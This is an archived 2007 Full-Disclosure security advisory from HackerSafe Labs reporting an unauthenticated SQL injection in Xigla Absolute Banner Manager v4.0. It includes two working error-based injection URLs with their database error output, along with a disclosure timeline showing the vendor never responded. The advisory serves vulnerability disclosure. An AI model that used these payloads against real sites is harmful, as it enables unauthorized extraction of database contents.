| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 6 Dec 2007 13:11:55 -0500
From: "Joseph Pierini" <joseph.pierini@...kersafe.com>
To: "Hacker Safe Labs" <labs@...kersafe.com>
Subject: HackerSafe Labs - Security Advisory - Xigla
Absolute Banner Manager v4.0
HackerSafe Labs - Security Advisory
http://www.hackersafelabs.com/ <http://www.hackersafelabs.com/>
Date: 12/06/2007
Vendor: http://www.xigla.com <http://www.xigla.com>
Package: Xigla Absolute Banner Manager
Versions: v4.0
Credit: Joseph Pierini - HackerSafe Labs
Risk:
Related Exploit Range: Remote
Attack Complexity: Medium
Level of Authentication Needed: Not Required
Confidentiality Impact: Major
Integrity Impact: Major
Availability Impact: Major
Overview:
Absolute Banner Manager .NET is a feature packed Ad Tracking and Banner
Management software specially developed for the webmaster looking for a
scalable, flexible and reliable Banner Ad Serving front-end tool.
Vulnerabilities:
A SQL injection exists in the Windows version of the Xigla Absolute
Banner Manager application.
SQL Injection Page: "abm.aspx"
SQL Injection Parameter: "z="
Examples:
http://www.domainname.com/absolutebm/abm.aspx?z=@@version
<http://www.domainname.com/absolutebm/abm.aspx?z=@@version>
Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 -
8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003
Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790:
Service Pack 1) ' to a column of data type int.
http://www.domainname.com/absolutebm/abm.aspx?z=1))%20and%201=convert(in
t,(select%20top%201%20%20convert(varchar,name)%20from%20sysobjects%20whe
re%20xtype=char(85)))
<http://www.domainname.com/absolutebm/abm.aspx?z=1))%20and%201=convert(i
nt,(select%20top%201%20%20convert(varchar,name)%20from%20sysobjects%20wh
ere%20xtype=char(85)))> -
Syntax error converting the varchar value 'dtproperties' to a column of
data type int.
Resolution Timeline:
Vendor Notification: October 29, 2007 : 'info@...la.com'
'security@...la.com'
Vendor Response: None
Vendor Fix: None
Public release of advisory: December 6, 2007
ScanAlert Responsible Disclosure Policy
ScanAlert believes in the responsible disclosure of vulnerability
information with a coordinated release with the vendor where possible.
Except where active and/or trivial exploitation of the vulnerability is
present, ScanAlert believes it is in the best interest of the community
when the vendor participates in the process of disclosure and has
sufficient time to respond effectively. If ScanAlert exhausts all
reasonable means in order to contact a vendor, then ScanAlert may issue
a public advisory disclosing its findings 15 business days after the
initial contact.
ScanAlert's mission is to make the web safe from hackers.
We make web sites secure from hackers and certify it to their customers
via
our patent pending HACKER SAFE(r) security certification technology. Our
daily
security audits and real-time certification enables consumers to know
whether the sites where they shop are taking the necessary steps to
safeguard their personal information from hackers. By alleviating
consumers'
fears of identity theft and credit card fraud, online merchants who earn
HACKER SAFE certification consistently see substantial increases in
online
transactions
Joseph Pierini, CISSP | Director, Enterprise Services
ScanAlert ( www.scanalert.com) <http://www.scanalert.com)>
labs@...kersafe.com <mailto:labs@...kersafe.com>
877-302-9965 ext 1185
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists